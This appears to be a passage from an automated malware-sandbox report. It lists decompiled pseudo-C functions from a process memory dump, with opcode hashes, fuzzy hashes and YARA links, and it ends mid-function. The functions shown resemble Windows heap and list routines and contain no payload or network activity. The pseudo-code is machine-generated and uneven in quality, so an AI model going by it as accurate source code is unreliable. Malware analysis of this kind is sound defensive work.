                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                                    • Instruction ID: ec1b79aa6b1a10f51d413b6f74a2912952b45519848e16589d70e8236fb6d1ed
                                                                                                                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                                    • Instruction Fuzzy Hash: A921F536204204AFDB09DF58CC84A6ABBA5EFC8750F08856AF9958F381D730D949CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03147794, Relevance: .1, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E03147794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x31b7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0310F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E030E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E03109AE0();
					_t24 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                                                                    0x03147799
                                                                                                                                                    0x0314779a
                                                                                                                                                    0x0314779b
                                                                                                                                                    0x031477a3
                                                                                                                                                    0x031477ab
                                                                                                                                                    0x031477ae
                                                                                                                                                    0x031477b1
                                                                                                                                                    0x031477b1
                                                                                                                                                    0x031477bf
                                                                                                                                                    0x031477c4
                                                                                                                                                    0x031477c8
                                                                                                                                                    0x031477ce
                                                                                                                                                    0x031477d4
                                                                                                                                                    0x031477e0
                                                                                                                                                    0x031477e0
                                                                                                                                                    0x031477d6
                                                                                                                                                    0x031477d6
                                                                                                                                                    0x031477de
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031477de
                                                                                                                                                    0x031477e5
                                                                                                                                                    0x031477f0
                                                                                                                                                    0x031477f3
                                                                                                                                                    0x031477f6
                                                                                                                                                    0x031477fd
                                                                                                                                                    0x03147800
                                                                                                                                                    0x0314780c
                                                                                                                                                    0x03147818
                                                                                                                                                    0x0314782b
                                                                                                                                                    0x0314781a
                                                                                                                                                    0x03147823
                                                                                                                                                    0x03147823
                                                                                                                                                    0x03147830
                                                                                                                                                    0x03147831
                                                                                                                                                    0x03147838
                                                                                                                                                    0x0314783d
                                                                                                                                                    0x0314783e
                                                                                                                                                    0x0314784f
                                                                                                                                                    0x0314784f
                                                                                                                                                    0x0314785a

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e16f976086cc0a5159cf7e04b4181e46b916b50770acd27a1c4b3466ec94b20
                                                                                                                                                    • Instruction ID: e21424d4a351c559e899a1875d167ac2e1d332cdc39e9e0ee7b9bf938f51f711
                                                                                                                                                    • Opcode Fuzzy Hash: 1e16f976086cc0a5159cf7e04b4181e46b916b50770acd27a1c4b3466ec94b20
                                                                                                                                                    • Instruction Fuzzy Hash: 3521CF72600604AFC725DF69D880EABB7A8EF8C740F140569E50ADB690D734E900CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030EAE73, Relevance: .1, Instructions: 70COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E030EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E030E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E030E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E030E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E030E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03147794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                                                                    0x030eae78
                                                                                                                                                    0x030eae7c
                                                                                                                                                    0x030eae7e
                                                                                                                                                    0x030eae81
                                                                                                                                                    0x030eae86
                                                                                                                                                    0x030eae8d
                                                                                                                                                    0x03132691
                                                                                                                                                    0x030eae93
                                                                                                                                                    0x030eae93
                                                                                                                                                    0x030eae93
                                                                                                                                                    0x030eae98
                                                                                                                                                    0x030eae9d
                                                                                                                                                    0x031326a2
                                                                                                                                                    0x031326b4
                                                                                                                                                    0x031326a4
                                                                                                                                                    0x031326ad
                                                                                                                                                    0x031326ad
                                                                                                                                                    0x031326b9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031326bb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031326bb
                                                                                                                                                    0x030eaea3
                                                                                                                                                    0x030eaea3
                                                                                                                                                    0x030eaea3
                                                                                                                                                    0x030eaeaa
                                                                                                                                                    0x031326c0
                                                                                                                                                    0x031326c9
                                                                                                                                                    0x031326c9
                                                                                                                                                    0x030eaeb3
                                                                                                                                                    0x031326d4
                                                                                                                                                    0x031326e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031326e7
                                                                                                                                                    0x031326ee
                                                                                                                                                    0x031326f0
                                                                                                                                                    0x031326f9
                                                                                                                                                    0x031326f9
                                                                                                                                                    0x03132702
                                                                                                                                                    0x03132708
                                                                                                                                                    0x03132708
                                                                                                                                                    0x0313270b
                                                                                                                                                    0x0313270f
                                                                                                                                                    0x03132711
                                                                                                                                                    0x03132711
                                                                                                                                                    0x03132725
                                                                                                                                                    0x03132725
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eaeb9
                                                                                                                                                    0x030eaeb9
                                                                                                                                                    0x030eaebf
                                                                                                                                                    0x030eaebf
                                                                                                                                                    0x030eaeb3

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                                    • Instruction ID: ecc491bccb269d17fbea0a9f006620ce15b83ed8d436746871d1e4aaa109e424
                                                                                                                                                    • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                                    • Instruction Fuzzy Hash: B921F3B1B06684DFDB26EB69C944B6577E8EF49740F1D08E0DD048B7A2E738DC42C6A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FFD9B, Relevance: .1, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E030FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E030D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                                                                    0x030ffd9b
                                                                                                                                                    0x030ffda0
                                                                                                                                                    0x030ffda1
                                                                                                                                                    0x030ffdab
                                                                                                                                                    0x030ffdad
                                                                                                                                                    0x030ffdb0
                                                                                                                                                    0x030ffdb8
                                                                                                                                                    0x030ffe0f
                                                                                                                                                    0x030ffde6
                                                                                                                                                    0x030ffde9
                                                                                                                                                    0x030ffdec
                                                                                                                                                    0x0313c0c0
                                                                                                                                                    0x030ffdfe
                                                                                                                                                    0x030ffe06
                                                                                                                                                    0x030ffe06
                                                                                                                                                    0x0313c0c8
                                                                                                                                                    0x030ffe2d
                                                                                                                                                    0x030ffe2d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffe2d
                                                                                                                                                    0x0313c0d1
                                                                                                                                                    0x0313c0e0
                                                                                                                                                    0x0313c0e5
                                                                                                                                                    0x0313c0e5
                                                                                                                                                    0x0313c0e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313c0e8
                                                                                                                                                    0x030ffdf4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffdf6
                                                                                                                                                    0x030ffdfa
                                                                                                                                                    0x030ffe1a
                                                                                                                                                    0x030ffe1f
                                                                                                                                                    0x030ffe1f
                                                                                                                                                    0x030ffdfc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffdfc
                                                                                                                                                    0x030ffdcc
                                                                                                                                                    0x030ffdd0
                                                                                                                                                    0x030ffe26
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ffe26
                                                                                                                                                    0x030ffdd8
                                                                                                                                                    0x030ffddb
                                                                                                                                                    0x030ffddd
                                                                                                                                                    0x030ffde0
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                                    • Instruction ID: 1c5691a1a1478aedc49d593daf1deb62801ede09575ea37720c9006dc075d801
                                                                                                                                                    • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                                    • Instruction Fuzzy Hash: 2D218E76A02A42DFC735CF09C540E66F7E9EF94B10F28857EEA4A8BA11D7309C00CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FB390, Relevance: .1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                    			E030FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E030E2280(_t12, 0x31b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E031000C2(0x31b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                                                                    0x030fb395
                                                                                                                                                    0x030fb3a2
                                                                                                                                                    0x030fb3a5
                                                                                                                                                    0x030fb3aa
                                                                                                                                                    0x030fb3b2
                                                                                                                                                    0x030fb3ba
                                                                                                                                                    0x030fb3bd
                                                                                                                                                    0x030fb3c0
                                                                                                                                                    0x030fb3c4
                                                                                                                                                    0x030fb3c9
                                                                                                                                                    0x0313a3e9
                                                                                                                                                    0x0313a3ed
                                                                                                                                                    0x0313a3f0
                                                                                                                                                    0x0313a3ff
                                                                                                                                                    0x0313a403
                                                                                                                                                    0x0313a409
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0313a40b
                                                                                                                                                    0x0313a40b
                                                                                                                                                    0x0313a40f
                                                                                                                                                    0x0313a415
                                                                                                                                                    0x0313a423
                                                                                                                                                    0x0313a423
                                                                                                                                                    0x0313a415
                                                                                                                                                    0x030fb3d1
                                                                                                                                                    0x030fb3e8
                                                                                                                                                    0x030fb3e8
                                                                                                                                                    0x030fb3d9

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a0c9a7723ec8870f8e2b81e9a2e3296127bb7cf882794e17636f090fbaa68867
                                                                                                                                                    • Instruction ID: 47e07983ca4553c8fca258adc827b3baa1654ee7d349785f23982844560ab612
                                                                                                                                                    • Opcode Fuzzy Hash: a0c9a7723ec8870f8e2b81e9a2e3296127bb7cf882794e17636f090fbaa68867
                                                                                                                                                    • Instruction Fuzzy Hash: 51116F373422145FCB18DA14CE81A6B72AEEFCD730B29012DDE16DB780CB715C02C694
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C9240, Relevance: .1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                    			E030C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x319f708);
				E0311D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E031095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E031095D0();
				_t33 =  *0x31b84c4; // 0x0
				L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x31b84c4; // 0x0
				L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x31b84c4; // 0x0
				E030E2280(L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x31b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E031095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E031095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E030C9325();
					_t50 =  *0x31b84c4; // 0x0
					return E0311D0D1(L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                                                    0x030c9240
                                                                                                                                                    0x030c9242
                                                                                                                                                    0x030c9247
                                                                                                                                                    0x030c924c
                                                                                                                                                    0x030c924e
                                                                                                                                                    0x030c9255
                                                                                                                                                    0x030c9257
                                                                                                                                                    0x030c925a
                                                                                                                                                    0x030c925f
                                                                                                                                                    0x030c925f
                                                                                                                                                    0x030c9266
                                                                                                                                                    0x030c9271
                                                                                                                                                    0x030c9276
                                                                                                                                                    0x030c9279
                                                                                                                                                    0x030c927e
                                                                                                                                                    0x030c9295
                                                                                                                                                    0x030c929a
                                                                                                                                                    0x030c92b1
                                                                                                                                                    0x030c92b6
                                                                                                                                                    0x030c92d7
                                                                                                                                                    0x030c92dc
                                                                                                                                                    0x030c92e0
                                                                                                                                                    0x030c92e6
                                                                                                                                                    0x030c92e8
                                                                                                                                                    0x030c92ee
                                                                                                                                                    0x030c9332
                                                                                                                                                    0x030c9333
                                                                                                                                                    0x030c9337
                                                                                                                                                    0x030c9338
                                                                                                                                                    0x030c933a
                                                                                                                                                    0x030c933a
                                                                                                                                                    0x030c933d
                                                                                                                                                    0x030c9342
                                                                                                                                                    0x030c9342
                                                                                                                                                    0x030c9345
                                                                                                                                                    0x030c9349
                                                                                                                                                    0x030c934e
                                                                                                                                                    0x030c9352
                                                                                                                                                    0x030c9357
                                                                                                                                                    0x030c92f4
                                                                                                                                                    0x030c92f4
                                                                                                                                                    0x030c92f6
                                                                                                                                                    0x030c92f9
                                                                                                                                                    0x030c9300
                                                                                                                                                    0x030c9306
                                                                                                                                                    0x030c9324
                                                                                                                                                    0x030c9324

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: eecced0a52ace8ea20db0a67424813e5abc5bbb2f1ac35ff25c8eb55b8153f1a
                                                                                                                                                    • Instruction ID: f1f6203979b75aa89040990ac5016e249adc7147f81615db4b2d32b4557882ad
                                                                                                                                                    • Opcode Fuzzy Hash: eecced0a52ace8ea20db0a67424813e5abc5bbb2f1ac35ff25c8eb55b8153f1a
                                                                                                                                                    • Instruction Fuzzy Hash: F2215935152A40DFC725EF68CA00F9AB7F9BF08B04F04456CE0498A6B2DB34E952DB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 03154257, Relevance: .1, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                    			E03154257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x31a08d0);
				E0311D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E031541E8(__ebx, __edi, __ecx, _t39);
				E030DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x31b87e4;
					_t18 =  *0x31b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x31b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x31b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x31b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L030C7055(_t31 + 0xfffffff8);
								_t24 =  *0x31b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x31b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x31b5cd0;
				if( *0x31b5cd0 <= 0) {
					L030C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x31b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x31b87e8 = _t30;
						 *0x31b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0311D0D1(L03154320());
			}















                                                                                                                                                    0x03154257
                                                                                                                                                    0x03154257
                                                                                                                                                    0x03154257
                                                                                                                                                    0x03154259
                                                                                                                                                    0x0315425e
                                                                                                                                                    0x03154263
                                                                                                                                                    0x03154265
                                                                                                                                                    0x03154273
                                                                                                                                                    0x03154278
                                                                                                                                                    0x0315427c
                                                                                                                                                    0x0315427f
                                                                                                                                                    0x03154281
                                                                                                                                                    0x03154287
                                                                                                                                                    0x031542d7
                                                                                                                                                    0x031542d7
                                                                                                                                                    0x031542da
                                                                                                                                                    0x0315428d
                                                                                                                                                    0x0315428d
                                                                                                                                                    0x0315428f
                                                                                                                                                    0x03154292
                                                                                                                                                    0x03154297
                                                                                                                                                    0x0315429c
                                                                                                                                                    0x031542a0
                                                                                                                                                    0x031542a6
                                                                                                                                                    0x031542a8
                                                                                                                                                    0x031542ae
                                                                                                                                                    0x031542b3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031542ba
                                                                                                                                                    0x031542ba
                                                                                                                                                    0x031542bf
                                                                                                                                                    0x031542c5
                                                                                                                                                    0x031542ca
                                                                                                                                                    0x031542cf
                                                                                                                                                    0x031542d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031542d0
                                                                                                                                                    0x031542b3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031542a6
                                                                                                                                                    0x0315429c
                                                                                                                                                    0x031542dc
                                                                                                                                                    0x031542dc
                                                                                                                                                    0x031542e3
                                                                                                                                                    0x03154309
                                                                                                                                                    0x031542e5
                                                                                                                                                    0x031542e5
                                                                                                                                                    0x031542e8
                                                                                                                                                    0x031542ee
                                                                                                                                                    0x031542f0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031542f2
                                                                                                                                                    0x031542f2
                                                                                                                                                    0x031542f4
                                                                                                                                                    0x031542f7
                                                                                                                                                    0x031542f9
                                                                                                                                                    0x03154300
                                                                                                                                                    0x03154300
                                                                                                                                                    0x031542f0
                                                                                                                                                    0x0315430e
                                                                                                                                                    0x0315431f

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: db8324abfccf78f0271610606b6a88839d036110c3dc5fcca8efdec28e55362a
                                                                                                                                                    • Instruction ID: a29855134ae8c7ba1e1b1b8215a7aa790937b3289344f06a3a733eeae4640a3e
                                                                                                                                                    • Opcode Fuzzy Hash: db8324abfccf78f0271610606b6a88839d036110c3dc5fcca8efdec28e55362a
                                                                                                                                                    • Instruction Fuzzy Hash: 38217974501760CFC759EF65E000658BBB9FB8D71AB6482AEE5698B294EB3094C2CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F2397, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                    			E030F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x31b848c != 0) {
					L030EFAD0(0x31b8610);
